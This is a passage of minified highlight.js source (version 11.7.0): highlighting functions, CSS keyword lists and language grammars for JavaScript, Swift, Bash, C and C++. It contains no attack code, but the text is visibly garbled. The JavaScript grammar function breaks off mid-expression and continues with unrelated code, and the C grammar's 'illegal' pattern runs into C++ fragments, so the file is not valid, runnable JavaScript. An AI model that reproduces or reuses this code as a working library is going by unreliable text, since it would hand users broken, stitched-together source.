-1}return 0}),[s,l]=r,o=s;return o.secondBest=l,o}function x(e){let n=null,t=(e=>{let n=e.className+" ";n+=e.parentNode?e.parentNode.className:"";let t=$.languageDetectRe.exec(n);if(t){let a=O(t[1]);return a||(U(o.replace("{}",t[1])),U("Falling back to no-highlight mode for this block.",e)),a?t[1]:"no-highlight"}return n.split(/\s+/).find(e=>y(e)||O(e))})(e);if(y(t))return;if(z("before:highlightElement",{el:e,language:t}),e.children.length>0&&($.ignoreUnescapedHTML||$.throwUnescapedHTML))throw new H("One of your code blocks includes unescaped HTML.",e.innerHTML);n=e;let a=n.textContent,i=t?N(a,{language:t,ignoreIllegals:!0}):v(a);e.innerHTML=i.value,((e,n,t)=>{let 
a=n&&r[n]||t;e.classList.add("hljs"),e.classList.add("language-"+a)})(e,t,i.language),e.result={language:i.language,re:i.relevance,relevance:i.relevance},i.secondBest&&(e.secondBest={language:i.secondBest.language,relevance:i.secondBest.relevance}),z("after:highlightElement",{el:e,result:i,text:a})}let k=!1;function M(){"loading"!==document.readyState?document.querySelectorAll($.cssSelector).forEach(x):k=!0}function O(e){return a[e=(e||"").toLowerCase()]||a[r[e]]}function S(e,{languageName:n}){"string"==typeof e&&(e=[e]),e.forEach(e=>{r[e.toLowerCase()]=n})}function C(e){let n=O(e);return n&&!n.disableAutodetect}function z(e,n){let t=e;s.forEach(e=>{e[t]&&e[t](n)})}for(let j in"undefined"!=typeof window&&window.addEventListener&&window.addEventListener("DOMContentLoaded",()=>{k&&M()},!1),Object.assign(n,{highlight:N,highlightAuto:v,highlightAll:M,highlightElement:x,highlightBlock:e=>(P("10.7.0","highlightBlock will be removed entirely in v12.0"),P("10.7.0","Please use highlightElement now."),x(e)),configure(e){$=G($,e)},initHighlighting(){M(),P("10.6.0","initHighlighting() deprecated. Use highlightAll() now.")},initHighlightingOnLoad(){M(),P("10.6.0","initHighlightingOnLoad() deprecated. 
Use highlightAll() now.")},registerLanguage(e,t){let i=null;try{i=t(n)}catch(r){if(F("Language definition for '{}' could not be registered.".replace("{}",e)),!l)throw r;F(r),i=f}i.name||(i.name=e),a[e]=i,i.rawDefinition=t.bind(null,n),i.aliases&&S(i.aliases,{languageName:e})},unregisterLanguage(e){for(let n of(delete a[e],Object.keys(r)))r[n]===e&&delete r[n]},listLanguages:()=>Object.keys(a),getLanguage:O,registerAliases:S,autoDetection:C,inherit:G,addPlugin(e){var n;(n=e)["before:highlightBlock"]&&!n["before:highlightElement"]&&(n["before:highlightElement"]=e=>{n["before:highlightBlock"](Object.assign({block:e.el},e))}),n["after:highlightBlock"]&&!n["after:highlightElement"]&&(n["after:highlightElement"]=e=>{n["after:highlightBlock"](Object.assign({block:e.el},e))}),s.push(e)}}),n.debugMode=()=>{l=!1},n.safeMode=()=>{l=!0},n.versionString="11.7.0",n.regex={concat:m,lookahead:g,either:p,optional:b,anyNumberOfTimes:u},A)"object"==typeof A[j]&&e.exports(A[j]);return Object.assign(n,A),n})({});let 
X=e=>({IMPORTANT:{scope:"meta",begin:"!important"},BLOCK_COMMENT:e.C_BLOCK_COMMENT_MODE,HEXCOLOR:{scope:"number",begin:/#(([0-9a-fA-F]{3,4})|(([0-9a-fA-F]{2}){3,4}))\b/},FUNCTION_DISPATCH:{className:"built_in",begin:/[\w-]+(?=\()/},ATTRIBUTE_SELECTOR_MODE:{scope:"selector-attr",begin:/\[/,end:/\]/,illegal:"$",contains:[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},CSS_NUMBER_MODE:{scope:"number",begin:e.NUMBER_RE+"(%|em|ex|ch|rem|vw|vh|vmin|vmax|cm|mm|in|pt|pc|px|deg|grad|rad|turn|s|ms|Hz|kHz|dpi|dpcm|dppx)?",relevance:0},CSS_VARIABLE:{className:"attr",begin:/--[A-Za-z][A-Za-z0-9_-]*/}}),V=["a","abbr","address","article","aside","audio","b","blockquote","body","button","canvas","caption","cite","code","dd","del","details","dfn","div","dl","dt","em","fieldset","figcaption","figure","footer","form","h1","h2","h3","h4","h5","h6","header","hgroup","html","i","iframe","img","input","ins","kbd","label","legend","li","main","mark","menu","nav","object","ol","p","q","quote","samp","section","span","strong","summary","sup","table","tbody","td","textarea","tfoot","th","thead","time","tr","ul","var","video",],J=["any-hover","any-pointer","aspect-ratio","color","color-gamut","color-index","device-aspect-ratio","device-height","device-width","display-mode","forced-colors","grid","height","hover","inverted-colors","monochrome","orientation","overflow-block","overflow-inline","pointer","prefers-color-scheme","prefers-contrast","prefers-reduced-motion","prefers-reduced-transparency","resolution","scan","scripting","update","width","min-width","max-width","min-height","max-height",],Y=["active","any-link","blank","checked","current","default","defined","dir","disabled","drop","empty","enabled","first","first-child","first-of-type","fullscreen","future","focus","focus-visible","focus-within","has","host","host-context","hover","indeterminate","in-range","invalid","is","lang","last-child","last-of-type","left","link","local-link","not","nth-child","nth-col","nth-last-child","nth-last-col",
"nth-last-of-type","nth-of-type","only-child","only-of-type","optional","out-of-range","past","placeholder-shown","read-only","read-write","required","right","root","scope","target","target-within","user-invalid","valid","visited","where",],ee=["after","backdrop","before","cue","cue-region","first-letter","first-line","grammar-error","marker","part","placeholder","selection","slotted","spelling-error",],en=["align-content","align-items","align-self","all","animation","animation-delay","animation-direction","animation-duration","animation-fill-mode","animation-iteration-count","animation-name","animation-play-state","animation-timing-function","backface-visibility","background","background-attachment","background-blend-mode","background-clip","background-color","background-image","background-origin","background-position","background-repeat","background-size","block-size","border","border-block","border-block-color","border-block-end","border-block-end-color","border-block-end-style","border-block-end-width","border-block-start","border-block-start-color","border-block-start-style","border-block-start-width","border-block-style","border-block-width","border-bottom","border-bottom-color","border-bottom-left-radius","border-bottom-right-radius","border-bottom-style","border-bottom-width","border-collapse","border-color","border-image","border-image-outset","border-image-repeat","border-image-slice","border-image-source","border-image-width","border-inline","border-inline-color","border-inline-end","border-inline-end-color","border-inline-end-style","border-inline-end-width","border-inline-start","border-inline-start-color","border-inline-start-style","border-inline-start-width","border-inline-style","border-inline-width","border-left","border-left-color","border-left-style","border-left-width","border-radius","border-right","border-right-color","border-right-style","border-right-width","border-spacing","border-style","border-top","border-top-color","border-top-left-radi
us","border-top-right-radius","border-top-style","border-top-width","border-width","bottom","box-decoration-break","box-shadow","box-sizing","break-after","break-before","break-inside","caption-side","caret-color","clear","clip","clip-path","clip-rule","color","column-count","column-fill","column-gap","column-rule","column-rule-color","column-rule-style","column-rule-width","column-span","column-width","columns","contain","content","content-visibility","counter-increment","counter-reset","cue","cue-after","cue-before","cursor","direction","display","empty-cells","filter","flex","flex-basis","flex-direction","flex-flow","flex-grow","flex-shrink","flex-wrap","float","flow","font","font-display","font-family","font-feature-settings","font-kerning","font-language-override","font-size","font-size-adjust","font-smoothing","font-stretch","font-style","font-synthesis","font-variant","font-variant-caps","font-variant-east-asian","font-variant-ligatures","font-variant-numeric","font-variant-position","font-variation-settings","font-weight","gap","glyph-orientation-vertical","grid","grid-area","grid-auto-columns","grid-auto-flow","grid-auto-rows","grid-column","grid-column-end","grid-column-start","grid-gap","grid-row","grid-row-end","grid-row-start","grid-template","grid-template-areas","grid-template-columns","grid-template-rows","hanging-punctuation","height","hyphens","icon","image-orientation","image-rendering","image-resolution","ime-mode","inline-size","isolation","justify-content","left","letter-spacing","line-break","line-height","list-style","list-style-image","list-style-position","list-style-type","margin","margin-block","margin-block-end","margin-block-start","margin-bottom","margin-inline","margin-inline-end","margin-inline-start","margin-left","margin-right","margin-top","marks","mask","mask-border","mask-border-mode","mask-border-outset","mask-border-repeat","mask-border-slice","mask-border-source","mask-border-width","mask-clip","mask-composite","mask-image","
mask-mode","mask-origin","mask-position","mask-repeat","mask-size","mask-type","max-block-size","max-height","max-inline-size","max-width","min-block-size","min-height","min-inline-size","min-width","mix-blend-mode","nav-down","nav-index","nav-left","nav-right","nav-up","none","normal","object-fit","object-position","opacity","order","orphans","outline","outline-color","outline-offset","outline-style","outline-width","overflow","overflow-wrap","overflow-x","overflow-y","padding","padding-block","padding-block-end","padding-block-start","padding-bottom","padding-inline","padding-inline-end","padding-inline-start","padding-left","padding-right","padding-top","page-break-after","page-break-before","page-break-inside","pause","pause-after","pause-before","perspective","perspective-origin","pointer-events","position","quotes","resize","rest","rest-after","rest-before","right","row-gap","scroll-margin","scroll-margin-block","scroll-margin-block-end","scroll-margin-block-start","scroll-margin-bottom","scroll-margin-inline","scroll-margin-inline-end","scroll-margin-inline-start","scroll-margin-left","scroll-margin-right","scroll-margin-top","scroll-padding","scroll-padding-block","scroll-padding-block-end","scroll-padding-block-start","scroll-padding-bottom","scroll-padding-inline","scroll-padding-inline-end","scroll-padding-inline-start","scroll-padding-left","scroll-padding-right","scroll-padding-top","scroll-snap-align","scroll-snap-stop","scroll-snap-type","scrollbar-color","scrollbar-gutter","scrollbar-width","shape-image-threshold","shape-margin","shape-outside","speak","speak-as","src","tab-size","table-layout","text-align","text-align-all","text-align-last","text-combine-upright","text-decoration","text-decoration-color","text-decoration-line","text-decoration-style","text-emphasis","text-emphasis-color","text-emphasis-position","text-emphasis-style","text-indent","text-justify","text-orientation","text-overflow","text-rendering","text-shadow","text-transform","text
-underline-position","top","transform","transform-box","transform-origin","transform-style","transition","transition-delay","transition-duration","transition-property","transition-timing-function","unicode-bidi","vertical-align","visibility","voice-balance","voice-duration","voice-family","voice-pitch","voice-range","voice-rate","voice-stress","voice-volume","white-space","widows","width","will-change","word-break","word-spacing","word-wrap","writing-mode","z-index",].reverse(),et=Y.concat(ee);var ea="\\.([0-9](_*[0-9])*)",ei="[0-9a-fA-F](_*[0-9a-fA-F])*",er={className:"number",variants:[{begin:`(\\b([0-9](_*[0-9])*)((${ea})|\\.)?|(${ea}))[eE][+-]?([0-9](_*[0-9])*)[fFdD]?\\b`},{begin:`\\b([0-9](_*[0-9])*)((${ea})[fFdD]?\\b|\\.([fFdD]\\b)?)`},{begin:`(${ea})[fFdD]?\\b`},{begin:"\\b([0-9](_*[0-9])*)[fFdD]\\b"},{begin:`\\b0[xX]((${ei})\\.?|(${ei})?\\.(${ei}))[pP][+-]?([0-9](_*[0-9])*)[fFdD]?\\b`},{begin:"\\b(0|[1-9](_*[0-9])*)[lL]?\\b"},{begin:`\\b0[xX](${ei})[lL]?\\b`},{begin:"\\b0(_*[0-7])*[lL]?\\b"},{begin:"\\b0[bB][01](_*[01])*[lL]?\\b"},],relevance:0};let 
es="[A-Za-z$_][0-9A-Za-z$_]*",el=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends",],eo=["true","false","null","undefined","NaN","Infinity"],ec=["Object","Function","Boolean","Symbol","Math","Date","Number","BigInt","String","RegExp","Array","Float32Array","Float64Array","Int8Array","Uint8Array","Uint8ClampedArray","Int16Array","Int32Array","Uint16Array","Uint32Array","BigInt64Array","BigUint64Array","Set","Map","WeakSet","WeakMap","ArrayBuffer","SharedArrayBuffer","Atomics","DataView","JSON","Promise","Generator","GeneratorFunction","AsyncFunction","Reflect","Proxy","Intl","WebAssembly",],ed=["Error","EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError",],eg=["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape",],eu=["arguments","this","super","console","window","document","localStorage","module","global",],eb=[].concat(eg,ec,ed);function em(e){var n;let t=e.regex,a=es,i={begin:/<[A-Za-z0-9\\._:-]+/,end:/\/[A-Za-z0-9\\._:-]+>|\/>/,isTrulyOpeningTag(e,n){let t=e[0].length+e.index,a=e.input[t];if("<"===a||","===a)return void n.ignoreMatch();let i;">"===a&&(((e,{after:n})=>{let t="",v={match:[/const|var|let/,/\s+/,a,/\s*/,/=\s*/,/(async\s*)?/,t.lookahead(w),],keywords:"async",className:{1:"keyword",3:"title.function"},contains:[f]};return{name:"Javascript",aliases:["js","jsx","mjs","cjs"],keywords:r,exports:{PARAMS_CONTAINS:h,CLASS_REFERENCE:$},illegal:/#(?![$_A-z])/,contains:[e.SHEBANG({label:"shebang",binary:"node",relevance:5}),{label:"use_strict",className:"meta",relevance:10,begin:/^\s*['"]use 
(strict|asm)['"]/},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,d,g,u,b,{match:/\$\d+/},o,$,{className:"attr",begin:a+t.lookahead(":"),relevance:0},v,{begin:"("+e.RE_STARTERS_RE+"|\\b(case|return|throw)\\b)\\s*",keywords:"return throw case",relevance:0,contains:[b,e.REGEXP_MODE,{className:"function",begin:w,returnBegin:!0,end:"\\s*=>",contains:[{className:"params",variants:[{begin:e.UNDERSCORE_IDENT_RE,relevance:0},{className:null,begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:r,contains:h},]},]},{begin:/,/,relevance:0},{match:/\s+/,relevance:0},{variants:[{begin:"<>",end:""},{match:/<[A-Za-z0-9\\._:-]+\s*\/>/},{begin:i.begin,"on:begin":i.isTrulyOpeningTag,end:i.end},],subLanguage:"xml",contains:[{begin:i.begin,end:i.end,skip:!0,contains:["self"]},]},]},{variants:[{match:[/function/,/\s+/,a,/(?=\s*\()/]},{match:[/function/,/\s*(?=\()/]},],className:{1:"keyword",3:"title.function"},label:"func.def",contains:[f],illegal:/%/},{beginKeywords:"while if switch catch for"},{begin:"\\b(?!function)"+e.UNDERSCORE_IDENT_RE+"\\([^()]*(\\([^()]*(\\([^()]*\\)[^()]*)*\\)[^()]*)*\\)\\s*\\{",returnBegin:!0,label:"func.def",contains:[f,e.inherit(e.TITLE_MODE,{begin:a,className:"title.function"}),]},{match:/\.\.\./,relevance:0},N,{match:"\\$"+a,relevance:0},{match:[/\bconstructor(?=\s*\()/],className:{1:"title.function"},contains:[f]},y,{relevance:0,match:/\b[A-Z][A-Z_0-9]+\b/,className:"variable.constant"},E,{match:[/get|set/,/\s+/,a,/(?=\()/],className:{1:"keyword",3:"title.function"},contains:[{begin:/\(\)/},f]},{match:/\$[(.]/},]}}let 
ep=e=>m(/\b/,e,/\w$/.test(e)?/\b/:/\B/),e8=["Protocol","Type"].map(ep),eh=["init","self"].map(ep),ef=["Any","Self"],eE=["actor","any","associatedtype","async","await",/as\?/,/as!/,"as","break","case","catch","class","continue","convenience","default","defer","deinit","didSet","distributed","do","dynamic","else","enum","extension","fallthrough",/fileprivate\(set\)/,"fileprivate","final","for","func","get","guard","if","import","indirect","infix",/init\?/,/init!/,"inout",/internal\(set\)/,"internal","in","is","isolated","nonisolated","lazy","let","mutating","nonmutating",/open\(set\)/,"open","operator","optional","override","postfix","precedencegroup","prefix",/private\(set\)/,"private","protocol",/public\(set\)/,"public","repeat","required","rethrows","return","set","some","static","struct","subscript","super","switch","throws","throw",/try\?/,/try!/,"try","typealias",/unowned\(safe\)/,/unowned\(unsafe\)/,"unowned","var","weak","where","while","willSet",],e$=["false","nil","true"],ey=["assignment","associativity","higherThan","left","lowerThan","none","right",],eN=["#colorLiteral","#column","#dsohandle","#else","#elseif","#endif","#error","#file","#fileID","#fileLiteral","#filePath","#function","#if","#imageLiteral","#keyPath","#line","#selector","#sourceLocation","#warn_unqualified_access","#warning",],ew=["abs","all","any","assert","assertionFailure","debugPrint","dump","fatalError","getVaList","isKnownUniquelyReferenced","max","min","numericCast","pointwiseMax","pointwiseMin","precondition","preconditionFailure","print","readLine","repeatElement","sequence","stride","swap","swift_unboxFromSwiftValueWithType","transcode","type","unsafeBitCast","unsafeDowncast","withExtendedLifetime","withUnsafeMutablePointer","withUnsafePointer","withVaList","withoutActuallyEscaping","zip",],ev=p(/[/=\-+!*%<>&|^~?]/,/[\u00A1-\u00A7]/,/[\u00A9\u00AB]/,/[\u00AC\u00AE]/,/[\u00B0\u00B1]/,/[\u00B6\u00BB\u00BF\u00D7\u00F7]/,/[\u2016-\u2017]/,/[\u2020-\u2027]/,/[\u2030-\u203E]/,/[\u2041-\
u2053]/,/[\u2055-\u205E]/,/[\u2190-\u23FF]/,/[\u2500-\u2775]/,/[\u2794-\u2BFF]/,/[\u2E00-\u2E7F]/,/[\u3001-\u3003]/,/[\u3008-\u3020]/,/[\u3030]/),ex=p(ev,/[\u0300-\u036F]/,/[\u1DC0-\u1DFF]/,/[\u20D0-\u20FF]/,/[\uFE00-\uFE0F]/,/[\uFE20-\uFE2F]/),ek=m(ev,ex,"*"),eM=p(/[a-zA-Z_]/,/[\u00A8\u00AA\u00AD\u00AF\u00B2-\u00B5\u00B7-\u00BA]/,/[\u00BC-\u00BE\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u00FF]/,/[\u0100-\u02FF\u0370-\u167F\u1681-\u180D\u180F-\u1DBF]/,/[\u1E00-\u1FFF]/,/[\u200B-\u200D\u202A-\u202E\u203F-\u2040\u2054\u2060-\u206F]/,/[\u2070-\u20CF\u2100-\u218F\u2460-\u24FF\u2776-\u2793]/,/[\u2C00-\u2DFF\u2E80-\u2FFF]/,/[\u3004-\u3007\u3021-\u302F\u3031-\u303F\u3040-\uD7FF]/,/[\uF900-\uFD3D\uFD40-\uFDCF\uFDF0-\uFE1F\uFE30-\uFE44]/,/[\uFE47-\uFEFE\uFF00-\uFFFD]/),eO=p(eM,/\d/,/[\u0300-\u036F\u1DC0-\u1DFF\u20D0-\u20FF\uFE20-\uFE2F]/),eS=m(eM,eO,"*"),eA=m(/[A-Z]/,eO,"*"),eC=["autoclosure",m(/convention\(/,p("swift","block","c"),/\)/),"discardableResult","dynamicCallable","dynamicMemberLookup","escaping","frozen","GKInspectable","IBAction","IBDesignable","IBInspectable","IBOutlet","IBSegueAction","inlinable","main","nonobjc","NSApplicationMain","NSCopying","NSManaged",m(/objc\(/,eS,/\)/),"objc","objcMembers","propertyWrapper","requires_stored_property_inits","resultBuilder","testable","UIApplicationMain","unknown","usableFromInline",],eT=["iOS","iOSApplicationExtension","macOS","macOSApplicationExtension","macCatalyst","macCatalystApplicationExtension","watchOS","watchOSApplicationExtension","tvOS","tvOSApplicationExtension","swift",];var eR=Object.freeze({__proto__:null,grmr_bash(e){let n=e.regex,t={};Object.assign(t,{className:"variable",variants:[{begin:n.concat(/\$[\w\d#@][\w\d_]*/,"(?![\\w\\d])(?![$])")},{begin:/\$\{/,end:/\}/,contains:["self",{begin:/:-/,contains:[t]}]},]});let 
a={className:"subst",begin:/\$\(/,end:/\)/,contains:[e.BACKSLASH_ESCAPE]},i={begin:/<<-?\s*(?=\w+)/,starts:{contains:[e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,className:"string"}),]}},r={className:"string",begin:/"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,t,a]};a.contains.push(r);let s={begin:/\$?\(\(/,end:/\)\)/,contains:[{begin:/\d+#[0-9a-f]+/,className:"number"},e.NUMBER_MODE,t,]},l=e.SHEBANG({binary:"(fish|bash|zsh|sh|csh|ksh|tcsh|dash|scsh)",relevance:10}),o={className:"function",begin:/\w[\w\d_]*\s*\(\s*\)\s*\{/,returnBegin:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/\w[\w\d_]*/})],relevance:0};return{name:"Bash",aliases:["sh"],keywords:{$pattern:/\b[a-z][a-z0-9._-]+\b/,keyword:["if","then","else","elif","fi","for","while","in","do","done","case","esac","function",],literal:["true","false"],built_in:["break","cd","continue","eval","exec","exit","export","getopts","hash","pwd","readonly","return","shift","test","times","trap","umask","unset","alias","bind","builtin","caller","command","declare","echo","enable","help","let","local","logout","mapfile","printf","read","readarray","source","type","typeset","ulimit","unalias","set","shopt","autoload","bg","bindkey","bye","cap","chdir","clone","comparguments","compcall","compctl","compdescribe","compfiles","compgroups","compquote","comptags","comptry","compvalues","dirs","disable","disown","echotc","echoti","emulate","fc","fg","float","functions","getcap","getln","history","integer","jobs","kill","limit","log","noglob","popd","print","pushd","pushln","rehash","sched","setcap","setopt","stat","suspend","ttyctl","unfunction","unhash","unlimit","unsetopt","vared","wait","whence","where","which","zcompile","zformat","zftp","zle","zmodload","zparseopts","zprof","zpty","zregexparse","zsocket","zstyle","ztcp","chcon","chgrp","chown","chmod","cp","dd","df","dir","dircolors","ln","ls","mkdir","mkfifo","mknod","mktemp","mv","realpath","rm","rmdir","shred","sync","touch","truncate","vdir","b2sum","base32","base64","cat","cks
um","comm","csplit","cut","expand","fmt","fold","head","join","md5sum","nl","numfmt","od","paste","ptx","pr","sha1sum","sha224sum","sha256sum","sha384sum","sha512sum","shuf","sort","split","sum","tac","tail","tr","tsort","unexpand","uniq","wc","arch","basename","chroot","date","dirname","du","echo","env","expr","factor","groups","hostid","id","link","logname","nice","nohup","nproc","pathchk","pinky","printenv","printf","pwd","readlink","runcon","seq","sleep","stat","stdbuf","stty","tee","test","timeout","tty","uname","unlink","uptime","users","who","whoami","yes",]},contains:[l,e.SHEBANG(),o,s,e.HASH_COMMENT_MODE,i,{match:/(\/[a-z._-]+)+/},r,{className:"",begin:/\\"/},{className:"string",begin:/'/,end:/'/},t,]}},grmr_c(e){let n=e.regex,t=e.COMMENT("//","$",{contains:[{begin:/\\\n/}]}),a="[a-zA-Z_]\\w*::",i="(decltype\\(auto\\)|"+n.optional(a)+"[a-zA-Z_]\\w*"+n.optional("<[^<>]+>")+")",r={className:"type",variants:[{begin:"\\b[a-z\\d_]*_t\\b"},{match:/\batomic_[a-z]{3,6}\b/},]},s={className:"string",variants:[{begin:'(u8?|U|L)?"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:"(u8?|U|L)?'(\\\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4,8}|[0-7]{3}|\\S)|.)",end:"'",illegal:"."},e.END_SAME_AS_BEGIN({begin:/(?:u8?|U|L)?R"([^()\\ ]{0,16})\(/,end:/\)([^()\\ ]{0,16})"/}),]},l={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)((ll|LL|l|L)(u|U)?|(u|U)(ll|LL|l|L)?|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"},],relevance:0},o={className:"meta",begin:/#\s*[a-z]+\b/,end:/$/,keywords:{keyword:"if else elif endif define undef warning error line pragma _Pragma ifdef ifndef 
include"},contains:[{begin:/\\\n/,relevance:0},e.inherit(s,{className:"string"}),{className:"string",begin:/<.*?>/},t,e.C_BLOCK_COMMENT_MODE,]},c={className:"title",begin:n.optional(a)+e.IDENT_RE,relevance:0},d=n.optional(a)+e.IDENT_RE+"\\s*\\(",g={keyword:["asm","auto","break","case","continue","default","do","else","enum","extern","for","fortran","goto","if","inline","register","restrict","return","sizeof","struct","switch","typedef","union","volatile","while","_Alignas","_Alignof","_Atomic","_Generic","_Noreturn","_Static_assert","_Thread_local","alignas","alignof","noreturn","static_assert","thread_local","_Pragma",],type:["float","double","signed","unsigned","int","short","long","char","void","_Bool","_Complex","_Imaginary","_Decimal32","_Decimal64","_Decimal128","const","static","complex","bool","imaginary",],literal:"true false NULL",built_in:"std string wstring cin cout cerr clog stdin stdout stderr stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set pair bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap priority_queue make_pair array shared_ptr abort terminate abs acos asin atan2 atan calloc ceil cosh cos exit exp fabs floor fmod fprintf fputs free frexp fscanf future isalnum isalpha iscntrl isdigit isgraph islower isprint ispunct isspace isupper isxdigit tolower toupper labs ldexp log10 log malloc realloc memchr memcmp memcpy memset modf pow printf putchar puts scanf sinh sin snprintf sprintf sqrt sscanf strcat strchr strcmp strcpy strcspn strlen strncat strncmp strncpy strpbrk strrchr strspn strstr tanh tan vfprintf vprintf vsprintf endl initializer_list unique_ptr"},u=[o,r,t,e.C_BLOCK_COMMENT_MODE,l,s],b={variants:[{begin:/=/,end:/;/},{begin:/\(/,end:/\)/},{beginKeywords:"new throw return 
else",end:/;/},],keywords:g,contains:u.concat([{begin:/\(/,end:/\)/,keywords:g,contains:u.concat(["self"]),relevance:0},]),relevance:0},m={begin:"("+i+"[\\*&\\s]+)+"+d,returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:g,illegal:/[^\w\s\*&:<>.]/,contains:[{begin:"decltype\\(auto\\)",keywords:g,relevance:0},{begin:d,returnBegin:!0,contains:[e.inherit(c,{className:"title.function"}),],relevance:0},{relevance:0,match:/,/},{className:"params",begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:[t,e.C_BLOCK_COMMENT_MODE,s,l,r,{begin:/\(/,end:/\)/,keywords:g,relevance:0,contains:["self",t,e.C_BLOCK_COMMENT_MODE,s,l,r]},]},r,t,e.C_BLOCK_COMMENT_MODE,o,]};return{name:"C",aliases:["h"],keywords:g,disableAutodetect:!0,illegal:"=]/,contains:[{beginKeywords:"final class struct"},e.TITLE_MODE,]},]),exports:{preprocessor:o,strings:s,keywords:g}}},grmr_cpp(e){let n=e.regex,t=e.COMMENT("//","$",{contains:[{begin:/\\\n/}]}),a="[a-zA-Z_]\\w*::",i="(?!struct)(decltype\\(auto\\)|"+n.optional(a)+"[a-zA-Z_]\\w*"+n.optional("<[^<>]+>")+")",r={className:"type",begin:"\\b[a-z\\d_]*_t\\b"},s={className:"string",variants:[{begin:'(u8?|U|L)?"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:"(u8?|U|L)?'(\\\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4,8}|[0-7]{3}|\\S)|.)",end:"'",illegal:"."},e.END_SAME_AS_BEGIN({begin:/(?:u8?|U|L)?R"([^()\\ ]{0,16})\(/,end:/\)([^()\\ ]{0,16})"/}),]},l={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)((ll|LL|l|L)(u|U)?|(u|U)(ll|LL|l|L)?|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"},],relevance:0},o={className:"meta",begin:/#\s*[a-z]+\b/,end:/$/,keywords:{keyword:"if else elif endif define undef warning error line pragma _Pragma ifdef ifndef 
include"},contains:[{begin:/\\\n/,relevance:0},e.inherit(s,{className:"string"}),{className:"string",begin:/<.*?>/},t,e.C_BLOCK_COMMENT_MODE,]},c={className:"title",begin:n.optional(a)+e.IDENT_RE,relevance:0},d=n.optional(a)+e.IDENT_RE+"\\s*\\(",g={type:["bool","char","char16_t","char32_t","char8_t","double","float","int","long","short","void","wchar_t","unsigned","signed","const","static",],keyword:["alignas","alignof","and","and_eq","asm","atomic_cancel","atomic_commit","atomic_noexcept","auto","bitand","bitor","break","case","catch","class","co_await","co_return","co_yield","compl","concept","const_cast|10","consteval","constexpr","constinit","continue","decltype","default","delete","do","dynamic_cast|10","else","enum","explicit","export","extern","false","final","for","friend","goto","if","import","inline","module","mutable","namespace","new","noexcept","not","not_eq","nullptr","operator","or","or_eq","override","private","protected","public","reflexpr","register","reinterpret_cast|10","requires","return","sizeof","static_assert","static_cast|10","struct","switch","synchronized","template","this","thread_local","throw","transaction_safe","transaction_safe_dynamic","true","try","typedef","typeid","typename","union","using","virtual","volatile","while","xor","xor_eq",],literal:["NULL","false","nullopt","nullptr","true"],built_in:["_Pragma"],_type_hints:["any","auto_ptr","barrier","binary_semaphore","bitset","complex","condition_variable","condition_variable_any","counting_semaphore","deque","false_type","future","imaginary","initializer_list","istringstream","jthread","latch","lock_guard","multimap","multiset","mutex","optional","ostringstream","packaged_task","pair","promise","priority_queue","queue","recursive_mutex","recursive_timed_mutex","scoped_lock","set","shared_future","shared_lock","shared_mutex","shared_timed_mutex","shared_ptr","stack","string_view","stringstream","timed_mutex","thread","true_type","tuple","unique_lock","unique_ptr","unordered_map","un
ordered_multimap","unordered_multiset","unordered_set","variant","vector","weak_ptr","wstring","wstring_view",]},u={className:"function.dispatch",relevance:0,keywords:{_hint:["abort","abs","acos","apply","as_const","asin","atan","atan2","calloc","ceil","cerr","cin","clog","cos","cosh","cout","declval","endl","exchange","exit","exp","fabs","floor","fmod","forward","fprintf","fputs","free","frexp","fscanf","future","invoke","isalnum","isalpha","iscntrl","isdigit","isgraph","islower","isprint","ispunct","isspace","isupper","isxdigit","labs","launder","ldexp","log","log10","make_pair","make_shared","make_shared_for_overwrite","make_tuple","make_unique","malloc","memchr","memcmp","memcpy","memset","modf","move","pow","printf","putchar","puts","realloc","scanf","sin","sinh","snprintf","sprintf","sqrt","sscanf","std","stderr","stdin","stdout","strcat","strchr","strcmp","strcpy","strcspn","strlen","strncat","strncmp","strncpy","strpbrk","strrchr","strspn","strstr","swap","tan","tanh","terminate","to_underlying","tolower","toupper","vfprintf","visit","vprintf","vsprintf",]},begin:n.concat(/\b/,/(?!decltype)/,/(?!if)/,/(?!for)/,/(?!switch)/,/(?!while)/,e.IDENT_RE,n.lookahead(/(<[^<>]+>|)\s*\(/))},b=[u,o,r,t,e.C_BLOCK_COMMENT_MODE,l,s],m={variants:[{begin:/=/,end:/;/},{begin:/\(/,end:/\)/},{beginKeywords:"new throw return 
